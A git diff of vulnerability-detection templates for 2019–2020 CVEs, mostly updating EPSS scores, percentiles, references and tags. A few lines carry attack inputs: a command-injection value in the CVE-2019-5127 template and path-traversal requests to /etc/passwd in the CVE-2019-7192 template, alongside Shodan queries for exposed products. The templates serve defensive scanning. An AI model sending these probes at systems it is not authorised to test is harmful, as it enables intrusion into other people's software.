+ epss-percentile: 0.9996
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Confluence"
diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml
index 962adcc90a..9509ad1aca 100644
--- a/http/cves/2019/CVE-2019-3398.yaml
+++ b/http/cves/2019/CVE-2019-3398.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2019-3398
cwe-id: CWE-22
- epss-score: 0.97304
+ epss-score: 0.97342
cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99829
metadata:
max-request: 5
vendor: atlassian
diff --git a/http/cves/2019/CVE-2019-3401.yaml b/http/cves/2019/CVE-2019-3401.yaml
index 8ab2a1518c..7da5ea6818 100644
--- a/http/cves/2019/CVE-2019-3401.yaml
+++ b/http/cves/2019/CVE-2019-3401.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-863
epss-score: 0.0055
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
+ epss-percentile: 0.74576
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
diff --git a/http/cves/2019/CVE-2019-3402.yaml b/http/cves/2019/CVE-2019-3402.yaml
index 999d026e8d..aa0b55b566 100644
--- a/http/cves/2019/CVE-2019-3402.yaml
+++ b/http/cves/2019/CVE-2019-3402.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00238
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
+ epss-percentile: 0.61147
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml
index c7099283e0..fe2eb6f1a5 100644
--- a/http/cves/2019/CVE-2019-3403.yaml
+++ b/http/cves/2019/CVE-2019-3403.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-863
epss-score: 0.00379
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
+ epss-percentile: 0.69498
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
diff --git a/http/cves/2019/CVE-2019-3799.yaml b/http/cves/2019/CVE-2019-3799.yaml
index b4a07f4164..1a7390404c 100644
--- a/http/cves/2019/CVE-2019-3799.yaml
+++ b/http/cves/2019/CVE-2019-3799.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2019-3799
cwe-id: CWE-22
- epss-score: 0.01684
+ epss-score: 0.0198
cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:*
+ epss-percentile: 0.87311
metadata:
max-request: 1
vendor: vmware
diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml
index e96e50ec72..ceb7ef4a02 100644
--- a/http/cves/2019/CVE-2019-3911.yaml
+++ b/http/cves/2019/CVE-2019-3911.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00195
cpe: cpe:2.3:a:labkey:labkey_server:*:*:community:*:*:*:*:*
+ epss-percentile: 0.56537
metadata:
max-request: 1
shodan-query: 'Server: Labkey'
diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml
index d56f8d05d0..e372ee2ab6 100644
--- a/http/cves/2019/CVE-2019-3912.yaml
+++ b/http/cves/2019/CVE-2019-3912.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-601
epss-score: 0.0016
cpe: cpe:2.3:a:labkey:labkey_server:*:*:*:*:community:*:*:*
+ epss-percentile: 0.51912
metadata:
max-request: 1
shodan-query: 'Server: Labkey'
diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml
index 047ebbc982..b619a807e8 100644
--- a/http/cves/2019/CVE-2019-3929.yaml
+++ b/http/cves/2019/CVE-2019-3929.yaml
@@ -15,9 +15,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-3929
- cwe-id: CWE-78,CWE-79
- epss-score: 0.97436
+ cwe-id: CWE-79,CWE-78
+ epss-score: 0.97438
cpe: cpe:2.3:o:crestron:am-100_firmware:1.6.0.2:*:*:*:*:*:*:*
+ epss-percentile: 0.99911
metadata:
max-request: 1
vendor: crestron
diff --git a/http/cves/2019/CVE-2019-5127.yaml b/http/cves/2019/CVE-2019-5127.yaml
index 94906f99b8..4fe6bb4194 100644
--- a/http/cves/2019/CVE-2019-5127.yaml
+++ b/http/cves/2019/CVE-2019-5127.yaml
@@ -13,14 +13,14 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-5127
cwe-id: CWE-78
- epss-score: 0.97401
+ epss-score: 0.97404
cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:*
+ epss-percentile: 0.99879
metadata:
max-request: 4
vendor: youphptube
product: youphptube_encoder
tags: cve,cve2019,rce
-
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
encode: "`id > {{filename}}.txt`"
diff --git a/http/cves/2019/CVE-2019-5418.yaml b/http/cves/2019/CVE-2019-5418.yaml
index 0242bd4527..c044e22196 100644
--- a/http/cves/2019/CVE-2019-5418.yaml
+++ b/http/cves/2019/CVE-2019-5418.yaml
@@ -15,8 +15,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-5418
- epss-score: 0.97413
+ epss-score: 0.97427
cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99897
metadata:
max-request: 1
vendor: rubyonrails
diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml
index 20bed1a3b5..b591405d47 100644
--- a/http/cves/2019/CVE-2019-5434.yaml
+++ b/http/cves/2019/CVE-2019-5434.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-502
epss-score: 0.28703
cpe: cpe:2.3:a:revive-sas:revive_adserver:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9626
metadata:
max-request: 2
shodan-query: http.favicon.hash:106844876
diff --git a/http/cves/2019/CVE-2019-6112.yaml b/http/cves/2019/CVE-2019-6112.yaml
index df1e89557c..6ccc1d65cc 100644
--- a/http/cves/2019/CVE-2019-6112.yaml
+++ b/http/cves/2019/CVE-2019-6112.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-6112
cwe-id: CWE-79
- epss-score: 0.00123
+ epss-score: 0.00126
cpe: cpe:2.3:a:graphpaperpress:sell_media:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.46438
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml
index e92c1677ab..feef9d510f 100644
--- a/http/cves/2019/CVE-2019-6340.yaml
+++ b/http/cves/2019/CVE-2019-6340.yaml
@@ -7,16 +7,17 @@ info:
description: Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10 V contain certain field types that do not properly sanitize data from non-form sources, which can lead to arbitrary PHP code execution in some cases.
reference:
- https://www.drupal.org/sa-core-2019-003
- - http://web.archive.org/web/20210125004201/https://www.securityfocus.com/bid/107106/
- https://www.synology.com/security/advisory/Synology_SA_19_09
- https://nvd.nist.gov/vuln/detail/CVE-2019-6340
+ - https://www.exploit-db.com/exploits/46452/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2019-6340
cwe-id: CWE-502
- epss-score: 0.97479
+ epss-score: 0.97369
cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99849
metadata:
max-request: 1
shodan-query: http.component:"drupal"
diff --git a/http/cves/2019/CVE-2019-6715.yaml b/http/cves/2019/CVE-2019-6715.yaml
index f0fc2d186b..6e6c7c19fa 100644
--- a/http/cves/2019/CVE-2019-6715.yaml
+++ b/http/cves/2019/CVE-2019-6715.yaml
@@ -16,6 +16,7 @@ info:
cve-id: CVE-2019-6715
epss-score: 0.23312
cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.95923
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml
index 08dd0d68fd..062f277ade 100644
--- a/http/cves/2019/CVE-2019-6799.yaml
+++ b/http/cves/2019/CVE-2019-6799.yaml
@@ -17,8 +17,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.9
cve-id: CVE-2019-6799
- epss-score: 0.10371
+ epss-score: 0.13969
cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.94952
metadata:
max-request: 6
fofa-query: body="pma_servername" && body="4.8.4"
diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml
index f135b56afb..3d0ea8f874 100644
--- a/http/cves/2019/CVE-2019-6802.yaml
+++ b/http/cves/2019/CVE-2019-6802.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-74
epss-score: 0.00113
cpe: cpe:2.3:a:python:pypiserver:*:*:*:*:*:*:*:*
+ epss-percentile: 0.44064
metadata:
max-request: 1
shodan-query: html:"pypiserver"
diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml
index c2d5e4242e..7624e65915 100644
--- a/http/cves/2019/CVE-2019-7192.yaml
+++ b/http/cves/2019/CVE-2019-7192.yaml
@@ -17,11 +17,16 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-7192
cwe-id: CWE-863
+ epss-score: 0.96645
+ cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99471
metadata:
max-request: 3
verified: true
shodan-query: 'Content-Length: 580 "http server 1.0"'
- tags: cve,cve2019,lfi,rce,kev,qnap,qts
+ vendor: qnap
+ product: photo_station
+ tags: packetstorm,cve,cve2019,lfi,rce,kev,qnap,qts
http:
- raw:
@@ -31,12 +36,10 @@ http:
Content-Type: application/x-www-form-urlencoded
a=setSlideshow&f=qsamplealbum
-
- |
GET /photo/slideshow.php?album={{album_id}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
-
- |
POST /photo/p/api/video.php HTTP/1.1
Host: {{Hostname}}
@@ -45,6 +48,7 @@ http:
album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
cookie-reuse: true
+
matchers-condition: and
matchers:
- type: regex
diff --git a/http/cves/2019/CVE-2019-7219.yaml b/http/cves/2019/CVE-2019-7219.yaml
index bdd57a17f4..4538c704c2 100644
--- a/http/cves/2019/CVE-2019-7219.yaml
+++ b/http/cves/2019/CVE-2019-7219.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00113
cpe: cpe:2.3:a:zarafa:webaccess:7.2.0-48204:*:*:*:*:*:*:*
+ epss-percentile: 0.43991
metadata:
max-request: 1
vendor: zarafa
diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml
index cef1eb3452..55b74bcc27 100644
--- a/http/cves/2019/CVE-2019-7238.yaml
+++ b/http/cves/2019/CVE-2019-7238.yaml
@@ -13,8 +13,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-7238
- epss-score: 0.97455
+ epss-score: 0.97478
cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99947
metadata:
max-request: 1
vendor: sonatype
diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml
index 6e0c0a5656..8db7454fda 100644
--- a/http/cves/2019/CVE-2019-7254.yaml
+++ b/http/cves/2019/CVE-2019-7254.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-7254
cwe-id: CWE-22
- epss-score: 0.87419
+ epss-score: 0.86088
cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9813
metadata:
max-request: 2
vendor: nortekcontrol
diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml
index 7c4fc24609..b7c1b81fb0 100644
--- a/http/cves/2019/CVE-2019-7255.yaml
+++ b/http/cves/2019/CVE-2019-7255.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.01544
cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.85509
metadata:
max-request: 1
shodan-query: http.title:"eMerge"
diff --git a/http/cves/2019/CVE-2019-7256.yaml b/http/cves/2019/CVE-2019-7256.yaml
index 703523c32b..1a628c7bb4 100644
--- a/http/cves/2019/CVE-2019-7256.yaml
+++ b/http/cves/2019/CVE-2019-7256.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 10
cve-id: CVE-2019-7256
cwe-id: CWE-78
- epss-score: 0.97356
+ epss-score: 0.97316
cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99808
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2019/CVE-2019-7275.yaml b/http/cves/2019/CVE-2019-7275.yaml
index 2359a9e820..86360f01ba 100644
--- a/http/cves/2019/CVE-2019-7275.yaml
+++ b/http/cves/2019/CVE-2019-7275.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00483
cpe: cpe:2.3:a:optergy:enterprise:*:*:*:*:*:*:*:*
+ epss-percentile: 0.72859
metadata:
max-request: 1
vendor: optergy
diff --git a/http/cves/2019/CVE-2019-7315.yaml b/http/cves/2019/CVE-2019-7315.yaml
index d463e3e438..7aae70d16a 100644
--- a/http/cves/2019/CVE-2019-7315.yaml
+++ b/http/cves/2019/CVE-2019-7315.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01275
cpe: cpe:2.3:o:genieaccess:wip3bvaf_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.83989
metadata:
max-request: 1
vendor: genieaccess
diff --git a/http/cves/2019/CVE-2019-7481.yaml b/http/cves/2019/CVE-2019-7481.yaml
index 99971effab..6acfb66c0c 100644
--- a/http/cves/2019/CVE-2019-7481.yaml
+++ b/http/cves/2019/CVE-2019-7481.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-7481
cwe-id: CWE-89
- epss-score: 0.92019
+ epss-score: 0.93374
cpe: cpe:2.3:o:sonicwall:sma_100_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98715
metadata:
max-request: 1
vendor: sonicwall
diff --git a/http/cves/2019/CVE-2019-7543.yaml b/http/cves/2019/CVE-2019-7543.yaml
index 90e044d9bf..7cb33ae203 100644
--- a/http/cves/2019/CVE-2019-7543.yaml
+++ b/http/cves/2019/CVE-2019-7543.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00113
cpe: cpe:2.3:a:kindsoft:kindeditor:4.1.11:*:*:*:*:*:*:*
+ epss-percentile: 0.44064
metadata:
max-request: 2
vendor: kindsoft
diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml
index 4c0688c923..82209e9b5b 100644
--- a/http/cves/2019/CVE-2019-7609.yaml
+++ b/http/cves/2019/CVE-2019-7609.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-94
epss-score: 0.97232
cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9975
metadata:
max-request: 1
vendor: elastic
diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml
index b0fddf8073..60ea67c86c 100644
--- a/http/cves/2019/CVE-2019-8086.yaml
+++ b/http/cves/2019/CVE-2019-8086.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-611
epss-score: 0.14515
cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:*
+ epss-percentile: 0.95041
metadata:
max-request: 2
shodan-query:
diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml
index ec84f290b2..1d1d7edaf6 100644
--- a/http/cves/2019/CVE-2019-8390.yaml
+++ b/http/cves/2019/CVE-2019-8390.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.01669
cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:*
+ epss-percentile: 0.86063
metadata:
verified: true
shodan-query: http.favicon.hash:762074255
diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml
index 0ac9b75b92..9a33a84dfb 100644
--- a/http/cves/2019/CVE-2019-8442.yaml
+++ b/http/cves/2019/CVE-2019-8442.yaml
@@ -14,6 +14,7 @@ info:
cve-id: CVE-2019-8442
epss-score: 0.9715
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99696
metadata:
max-request: 2
shodan-query: http.component:"Atlassian Jira"
diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml
index 33d604b5ec..f75ae6c001 100644
--- a/http/cves/2019/CVE-2019-8446.yaml
+++ b/http/cves/2019/CVE-2019-8446.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2019-8446
cwe-id: CWE-863
- epss-score: 0.0874
+ epss-score: 0.11721
cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.94559
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml
index 0ded4980f9..da0e6507ac 100644
--- a/http/cves/2019/CVE-2019-8449.yaml
+++ b/http/cves/2019/CVE-2019-8449.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2019-8449
cwe-id: CWE-306
- epss-score: 0.14234
+ epss-score: 0.1884
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95564
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
diff --git a/http/cves/2019/CVE-2019-8451.yaml b/http/cves/2019/CVE-2019-8451.yaml
index 0a9ecbbbb2..f5aa14d15c 100644
--- a/http/cves/2019/CVE-2019-8451.yaml
+++ b/http/cves/2019/CVE-2019-8451.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-918
epss-score: 0.97115
cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9968
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml
index 7da3a6f00a..d28d969ae5 100644
--- a/http/cves/2019/CVE-2019-8903.yaml
+++ b/http/cves/2019/CVE-2019-8903.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-8903
cwe-id: CWE-22
- epss-score: 0.02249
+ epss-score: 0.0192
cpe: cpe:2.3:a:totaljs:total.js:*:*:*:*:*:node.js:*:*
+ epss-percentile: 0.87107
metadata:
max-request: 1
framework: node.js
diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml
index c199a4e721..fd988e44d8 100644
--- a/http/cves/2019/CVE-2019-8937.yaml
+++ b/http/cves/2019/CVE-2019-8937.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00921
cpe: cpe:2.3:a:digitaldruid:hoteldruid:2.3.0:*:*:*:*:*:*:*
+ epss-percentile: 0.80927
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2019/CVE-2019-8982.yaml b/http/cves/2019/CVE-2019-8982.yaml
index e6da718845..0df14a6247 100644
--- a/http/cves/2019/CVE-2019-8982.yaml
+++ b/http/cves/2019/CVE-2019-8982.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-918
epss-score: 0.02146
cpe: cpe:2.3:a:wavemaker:wavemarker_studio:6.6:*:*:*:*:*:*:*
+ epss-percentile: 0.87849
metadata:
max-request: 1
vendor: wavemaker
diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml
index cef42a950c..86bbe9c4bc 100644
--- a/http/cves/2019/CVE-2019-9041.yaml
+++ b/http/cves/2019/CVE-2019-9041.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-917
epss-score: 0.01127
cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.1:*:*:*:*:*:*:*
+ epss-percentile: 0.82839
metadata:
max-request: 1
vendor: zzzcms
diff --git a/http/cves/2019/CVE-2019-9618.yaml b/http/cves/2019/CVE-2019-9618.yaml
index a7dcb5cd25..e59052ad2f 100644
--- a/http/cves/2019/CVE-2019-9618.yaml
+++ b/http/cves/2019/CVE-2019-9618.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.0643
cpe: cpe:2.3:a:gracemedia_media_player_project:gracemedia_media_player:1.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.92768
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2019/CVE-2019-9670.yaml b/http/cves/2019/CVE-2019-9670.yaml
index 07a352a51d..a7f1320033 100644
--- a/http/cves/2019/CVE-2019-9670.yaml
+++ b/http/cves/2019/CVE-2019-9670.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-9670
cwe-id: CWE-611
- epss-score: 0.97534
+ epss-score: 0.97513
cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9997
metadata:
max-request: 1
vendor: synacor
diff --git a/http/cves/2019/CVE-2019-9726.yaml b/http/cves/2019/CVE-2019-9726.yaml
index 3bdeac08e2..279ba4d419 100644
--- a/http/cves/2019/CVE-2019-9726.yaml
+++ b/http/cves/2019/CVE-2019-9726.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-22
epss-score: 0.02964
cpe: cpe:2.3:o:eq-3:ccu3_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.89569
metadata:
max-request: 1
vendor: eq-3
diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml
index 8dbd535996..d7cbd3c291 100644
--- a/http/cves/2019/CVE-2019-9733.yaml
+++ b/http/cves/2019/CVE-2019-9733.yaml
@@ -14,8 +14,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-9733
- epss-score: 0.91482
+ epss-score: 0.90473
cpe: cpe:2.3:a:jfrog:artifactory:6.7.3:*:*:*:*:*:*:*
+ epss-percentile: 0.98408
metadata:
max-request: 1
vendor: jfrog
diff --git a/http/cves/2019/CVE-2019-9915.yaml b/http/cves/2019/CVE-2019-9915.yaml
index 7825dcf1a3..1e599ab1da 100644
--- a/http/cves/2019/CVE-2019-9915.yaml
+++ b/http/cves/2019/CVE-2019-9915.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-9915
cwe-id: CWE-601
- epss-score: 0.00113
+ epss-score: 0.0016
cpe: cpe:2.3:a:get-simple.:getsimplecms:3.3.13:*:*:*:*:*:*:*
+ epss-percentile: 0.52017
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2019/CVE-2019-9922.yaml b/http/cves/2019/CVE-2019-9922.yaml
index 28a2b8f43f..50e7beca04 100644
--- a/http/cves/2019/CVE-2019-9922.yaml
+++ b/http/cves/2019/CVE-2019-9922.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-9922
cwe-id: CWE-22
- epss-score: 0.01083
+ epss-score: 0.01413
cpe: cpe:2.3:a:harmistechnology:je_messenger:1.2.2:*:*:*:*:joomla\!:*:*
+ epss-percentile: 0.84822
metadata:
max-request: 1
framework: joomla\!
diff --git a/http/cves/2019/CVE-2019-9955.yaml b/http/cves/2019/CVE-2019-9955.yaml
index 8e412b1673..ad8cb849f0 100644
--- a/http/cves/2019/CVE-2019-9955.yaml
+++ b/http/cves/2019/CVE-2019-9955.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-9955
cwe-id: CWE-79
- epss-score: 0.05803
+ epss-score: 0.0561
cpe: cpe:2.3:o:zyxel:atp200_firmware:4.31:*:*:*:*:*:*:*
+ epss-percentile: 0.92301
metadata:
max-request: 1
vendor: zyxel
diff --git a/http/cves/2019/CVE-2019-9978.yaml b/http/cves/2019/CVE-2019-9978.yaml
index da830751ab..48b321a3ad 100644
--- a/http/cves/2019/CVE-2019-9978.yaml
+++ b/http/cves/2019/CVE-2019-9978.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-9978
cwe-id: CWE-79
- epss-score: 0.97293
+ epss-score: 0.97286
cpe: cpe:2.3:a:warfareplugins:social_warfare:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.99784
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-0618.yaml b/http/cves/2020/CVE-2020-0618.yaml
index cf42798ee7..5129d58833 100644
--- a/http/cves/2020/CVE-2020-0618.yaml
+++ b/http/cves/2020/CVE-2020-0618.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2020-0618
cwe-id: CWE-502
- epss-score: 0.97426
+ epss-score: 0.97329
cpe: cpe:2.3:a:microsoft:sql_server:2012:sp4:*:*:*:*:*:*
+ epss-percentile: 0.99813
metadata:
max-request: 1
vendor: microsoft
diff --git a/http/cves/2020/CVE-2020-10148.yaml b/http/cves/2020/CVE-2020-10148.yaml
index 21cde2e130..cd1c3ddc83 100644
--- a/http/cves/2020/CVE-2020-10148.yaml
+++ b/http/cves/2020/CVE-2020-10148.yaml
@@ -17,14 +17,14 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-10148
cwe-id: CWE-287,CWE-288
- epss-score: 0.97377
+ epss-score: 0.97347
cpe: cpe:2.3:a:solarwinds:orion_platform:2019.4:hotfix5:*:*:*:*:*:*
+ epss-percentile: 0.99832
metadata:
max-request: 2
vendor: solarwinds
product: orion_platform
tags: cve,cve2020,solarwinds,rce,auth-bypass,kev
-
variables:
string: "{{to_lower(rand_text_alpha(5))}}"
@@ -35,6 +35,7 @@ http:
- "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l={{string}}&v={{string}}"
stop-at-first-match: true
+
matchers-condition: and
matchers:
- type: word
diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml
index f4ff1e264c..2ee8173b0e 100644
--- a/http/cves/2020/CVE-2020-10199.yaml
+++ b/http/cves/2020/CVE-2020-10199.yaml
@@ -9,13 +9,16 @@ info:
- https://twitter.com/iamnoooob/status/1246182773427240967
- https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
- https://nvd.nist.gov/vuln/detail/CVE-2020-10199
+ - http://packetstormsecurity.com/files/157261/Nexus-Repository-Manager-3.21.1-01-Remote-Code-Execution.html
+ - https://cwe.mitre.org/data/definitions/917.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2020-10199
cwe-id: CWE-917
- epss-score: 0.973
+ epss-score: 0.97217
cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99742
metadata:
max-request: 2
vendor: sonatype
diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml
index 309596a7c2..23b30c0bd9 100644
--- a/http/cves/2020/CVE-2020-10546.yaml
+++ b/http/cves/2020/CVE-2020-10546.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-10546
cwe-id: CWE-89
- epss-score: 0.39106
+ epss-score: 0.4901
cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97048
metadata:
max-request: 1
vendor: rconfig
diff --git a/http/cves/2020/CVE-2020-10547.yaml b/http/cves/2020/CVE-2020-10547.yaml
index 17dd8cc2e6..6a85d4f949 100644
--- a/http/cves/2020/CVE-2020-10547.yaml
+++ b/http/cves/2020/CVE-2020-10547.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-10547
cwe-id: CWE-89
- epss-score: 0.39106
+ epss-score: 0.4901
cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97048
metadata:
max-request: 1
vendor: rconfig
